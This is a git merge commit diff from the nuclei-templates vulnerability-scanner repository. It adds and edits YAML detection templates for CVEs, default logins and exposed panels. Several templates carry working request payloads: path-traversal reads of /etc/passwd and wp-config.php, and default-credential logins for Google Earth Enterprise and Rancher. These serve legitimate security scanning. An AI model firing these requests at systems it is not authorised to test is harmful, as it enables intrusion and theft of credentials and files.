Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into more-fixes

2021-10-14 23:51:16 +05:30 · 2021-10-14 23:51:16 +05:30 · 42cc6d9507
parent 9273a765c0 10ecdc806a
commit 42cc6d9507
32 changed files with 287 additions and 48 deletions
--- a/cves/2018/CVE-2018-12998.yaml
+++ b/cves/2018/CVE-2018-12998.yaml
@ -4,7 +4,7 @@ info:
  name: Zoho manageengine Arbitrary Reflected XSS
  author: pikpikcu
  severity: medium
-  description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
+  description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
  reference:
    - https://github.com/unh3x/just4cve/issues/10
    - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@ -0,0 +1,28 @@
 id: CVE-2021-40978
 info:
  name: mkdocs 1.2.2 built-in dev-server allows directory traversal
  author: pikpikcu
  severity: high
  reference:
    - https://github.com/nisdn/CVE-2021-40978
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40978
  tags: cve,cve2021,mkdocs,lfi
  description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
      - type: status
        status:
          - 200
--- a/vulnerabilities/other/ecoa-building-lfi.yaml
+++ b/vulnerabilities/other/ecoa-building-lfi.yaml
@ -1,12 +1,19 @@
-id: ecoa-building-lfi
+id: CVE-2021-41291
 info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
-  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+  reference:
-  tags: ecoa,lfi
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
  tags: cve,cve2021,ecoa,lfi
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-41291
    cwe-id: CWE-22
 requests:
  - raw:
@ -18,4 +25,3 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
--- a/cves/2021/CVE-2021-41293.yaml
+++ b/cves/2021/CVE-2021-41293.yaml
@ -0,0 +1,35 @@
 id: CVE-2021-41293
 info:
  name: ECOA Building Automation System - LFD
  author: 0x_Akoko
  severity: high
  description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
  tags: cve,cve2021,ecoa,lfi
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
 requests:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}
        yr=2021&mh=6&fname=../../../../../../../../etc/passwd
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@ -3,7 +3,7 @@ id: CVE-2021-41773
 info:
  name: Apache 2.4.49 - Path Traversal and Remote Code Execution
  author: daffainfo
-  severity: critical
+  severity: high
  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  reference:
    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
@ -12,6 +12,13 @@ info:
    - https://twitter.com/h4x0r_dz/status/1445401960371429381
    - https://github.com/blasty/CVE-2021-41773
  tags: cve,cve2021,lfi,rce,apache,misconfig
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-41773
    cwe-id: CWE-22
  metadata:
    shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
 requests:
  - raw:
--- a/default-logins/google/google-earth-dlogin.yaml
+++ b/default-logins/google/google-earth-dlogin.yaml
@ -0,0 +1,37 @@
 id: google-earth-dlogin
 info:
  name: Google Earth Enterprise Default Login
  author: orpheus,johnjhacking
  severity: high
  tags: default-login,google
  reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
  metadata:
    shodan-dork: 'title:"GEE Server"'
 requests:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
    attack: pitchfork
    payloads:
      username:
        - geapacheuser
      password:
        - geeadmin
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        condition: and
        words:
          - 'DashboardPanel'
          - 'Earth Enterprise Server'
--- a/default-logins/rancher/rancher-default-login.yaml
+++ b/default-logins/rancher/rancher-default-login.yaml
@ -0,0 +1,52 @@
 id: rancher-default-login
 info:
  name: Rancher Default Login
  author: princechaddha
  severity: high
  description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
  reference: https://github.com/rancher/rancher
  tags: default-login,rancher,kubernetes,devops,cloud
 requests:
  - raw:
      - |
        GET /v3/settings/first-login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
      - |
        POST /v3-public/localProviders/local?action=login HTTP/1.1
        Host: {{Hostname}}
        Cookie: CSRF={{csrf}}
        X-Api-Csrf: {{csrf}}
        Connection: close
        Content-Length: 136
        {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'R_SESS=token'
        part: header
    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: header
        regex:
          - 'Set-Cookie: CSRF=([a-z0-9]+)'
--- a/exposed-panels/netscaler-aaa-login.yaml
+++ b/exposed-panels/netscaler-aaa-login.yaml
@ -1,7 +1,7 @@
-id: netscalar-aaa-login
+id: netscaler-aaa-login
 info:
-  name: NetScalar AAA Login Panel
+  name: NetScaler AAA Login Panel
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6898
--- a/exposed-panels/rancher-panel.yaml
+++ b/exposed-panels/rancher-panel.yaml
@ -0,0 +1,34 @@
 id: rancher-panel
 info:
  name: Rancher Login Panel
  author: princechaddha
  severity: info
  description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
  reference: https://github.com/rancher/rancher
  tags: panel,rancher,kubernetes,devops,cloud
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Loading&hellip;</title>"
          - "global-admin/config/environment"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '<!\-\- ([0-9. ]+)\-\->'
--- a/misconfiguration/hpe-system-management-anonymous.yaml
+++ b/misconfiguration/hpe-system-management-anonymous.yaml
@ -0,0 +1,21 @@
 id: hpe-system-management-anonymous-access
 info:
  name: HPE System Management Anonymous Access
  author: divya_mudgal
  severity: low
  tags: hp,unauth
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/chpstrt.php?chppath=Home"
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "username = \"hpsmh_anonymous\";"
          - "var host_addr = '"
          - "var ip_addr   = '"
--- a/technologies/confluence-detect.yaml
+++ b/technologies/confluence-detect.yaml
@ -5,7 +5,9 @@ info:
  author: philippedelteil
  severity: info
  description: Allows you to detect Atlassian Confluence instances
-  tags: tech,confluence
+  tags: tech,confluence,atlassian
  metadata:
    shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22
 requests:
  - method: GET
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@ -20,3 +20,4 @@ requests:
        negative: true
        words:
          - 'BadApiKey'
          - 'RateLimitExceeded'   # Matchers needs to be replaced with valid +ve match instead of -ve
--- a/vulnerabilities/other/bitrix-open-redirect.yaml
+++ b/vulnerabilities/other/bitrix-open-redirect.yaml
@ -4,12 +4,12 @@ info:
  name: Bitrix Open URL redirect detection
  author: pikpikcu
  severity: low
  description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
  reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
  tags: redirect,bitrix
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
@ -33,7 +33,7 @@ requests:
        part: header
      - type: status
        condition: or
        status:
          - 302
          - 301
        condition: or
--- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml
+++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
@ -4,7 +4,7 @@ info:
  name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
  author: gy741
  severity: critical
-  description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+  description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
  reference:
    - https://www.exploit-db.com/exploits/50206
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
--- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
+++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
@ -4,6 +4,7 @@ info:
  name: DedeCmsV5.6 Carbuyaction Fileinclude
  author: pikpikcu
  severity: high
  description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
  reference: https://www.cnblogs.com/milantgh/p/3615986.html
  tags: dedecms
--- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml
+++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml
@ -4,6 +4,7 @@ info:
  name: DedeCMS Membergroup SQLI
  author: pikpikcu
  severity: medium
  description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
  reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
  tags: sqli,dedecms
--- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml
+++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml
@ -1,27 +0,0 @@
 id: ecoa-building-automation-lfd
 info:
  name: ECOA Building Automation System - LFD
  author: 0x_Akoko
  severity: high
  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
  tags: ecoa,lfi
 requests:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}
        yr=2021&mh=6&fname=../../../../../../../../etc/passwd
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        condition: and
      - type: status
        status:
          - 200
--- a/vulnerabilities/other/fatpipe-backdoor.yaml
+++ b/vulnerabilities/other/fatpipe-backdoor.yaml
@ -4,7 +4,7 @@ info:
  name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
  author: gy741
  severity: high
-  description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
+  description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
    - https://www.fatpipeinc.com/support/advisories.php
--- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml
@ -4,7 +4,8 @@ info:
  name: GeoVision Geowebserver 5.3.3 - LFI
  author: madrobot
  severity: high
-  reference: https://www.exploit-db.com/exploits/50211
+  description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
  reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  tags: geowebserver,lfi
 requests:
--- a/vulnerabilities/other/geovision-geowebserver-xss.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml
@ -4,7 +4,8 @@ info:
  name: GeoVision Geowebserver 5.3.3 - XSS
  author: madrobot
  severity: medium
-  reference: https://www.exploit-db.com/exploits/50211
+  description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
  reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  tags: geowebserver,xss
 requests:
--- a/vulnerabilities/other/h3c-imc-rce.yaml
+++ b/vulnerabilities/other/h3c-imc-rce.yaml
@ -1,9 +1,10 @@
 id: h3c-imc-rce
 info:
-  name: H3c IMC Rce
+  name: H3c IMC RCE
  author: pikpikcu
  severity: critical
  description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
  reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
  tags: rce,h3c-imc
--- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml
+++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml
@ -4,6 +4,7 @@ info:
  author: Udyz
  name: Hasura GraphQL Engine - postgresql query exec
  severity: critical
  description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
  reference: https://www.exploit-db.com/exploits/49802
  tags: hasura,rce
--- a/vulnerabilities/other/hiboss-rce.yaml
+++ b/vulnerabilities/other/hiboss-rce.yaml
@ -4,6 +4,7 @@ info:
  name: Hiboss RCE
  author: pikpikcu
  severity: critical
  description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
  reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
  tags: hiboss,rce
--- a/vulnerabilities/other/karel-ip-phone-lfi.yaml
+++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml
@ -4,6 +4,7 @@ info:
  name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100038
    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
--- a/vulnerabilities/other/netis-info-leak.yaml
+++ b/vulnerabilities/other/netis-info-leak.yaml
@ -5,6 +5,7 @@ info:
  author: gy741
  severity: medium
  reference: https://www.exploit-db.com/exploits/48384
  description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
  tags: netis,exposure
 requests:
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@ -4,6 +4,7 @@ info:
  name: Nginx Merge Slashes Path Traversal
  author: dhiyaneshDk
  severity: medium
  description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server.
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
    - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
--- a/vulnerabilities/other/opensis-lfi.yaml
+++ b/vulnerabilities/other/opensis-lfi.yaml
@ -4,9 +4,9 @@ info:
  name: openSIS 5.1 - 'ajax.php' Local File Inclusion
  author: pikpikcu
  severity: high
  description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
  reference:
    - https://www.exploit-db.com/exploits/38039
    - https://www.securityfocus.com/bid/56598/info
  tags: opensis,lfi
 requests:
--- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
+++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
@ -4,6 +4,7 @@ info:
  name: WordPress Attitude Themes 1.1.1 Open Redirection
  author: 0x_Akoko
  severity: low
  description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it.
  reference: https://cxsecurity.com/issue/WLB-2020030185
  tags: wordpress,wp-theme,redirect
--- a/vulnerabilities/wordpress/brandfolder-lfi.yaml
+++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml
@ -4,6 +4,7 @@ info:
  name: Wordpress brandfolder plugin - RFI & LFI
  author: 0x_Akoko
  severity: high
  description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
  reference:
    - https://www.exploit-db.com/exploits/39591
    - https://cxsecurity.com/issue/WLB-2016030120
--- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
+++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
@ -1,9 +1,10 @@
 id: brandfolder-open-redirect
 info:
-  name: Wordpress brandfolder plugin Open Redirect
+  name: WordPress Brandfolder Plugin Open Redirect
  author: 0x_Akoko
  severity: low
  description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
  reference: https://www.exploit-db.com/exploits/39591
  tags: wordpress,wp-plugin,lfi,rfi
--- a/vulnerabilities/wordpress/cherry-file-download.yaml
+++ b/vulnerabilities/wordpress/cherry-file-download.yaml
@ -0,0 +1,29 @@
 id: cherry-file-download
 info:
  name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://github.com/CherryFramework/cherry-plugin
  tags: wordpress,wp-plugin,lfi
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and
      - type: status
        status:
          - 200
--- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml
+++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml
@ -4,6 +4,7 @@ info:
  name: Wordpress Plugin Issuu Panel - RFI & LFI
  author: 0x_Akoko
  severity: high
  description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
  reference: https://cxsecurity.com/issue/WLB-2016030131
  tags: wp-plugin,wordpress,lfi,rfi